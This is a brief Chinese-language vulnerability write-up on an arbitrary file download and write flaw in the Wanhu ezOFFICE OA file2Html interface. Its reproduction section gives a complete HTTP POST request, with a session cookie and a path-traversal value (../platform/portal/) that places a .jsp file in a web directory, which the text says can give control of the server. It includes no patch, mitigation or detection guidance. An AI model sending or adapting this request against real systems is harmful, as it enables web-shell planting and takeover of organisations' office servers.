漏洞描述
万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE file2Html接口存在任意文件远程下载漏洞。攻击者可以通过此漏洞下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。
漏洞复现
- 下载文件,fileName参数存在13位字节限制。
POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: xxxxx
Content-Length: 144
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: LocLan=zh_CN; OASESSIONID=30170ED4FFE28967E72103EFFDFE11FA
Connection: close
fileName=1111111111112.jsp&path=../platform/portal/&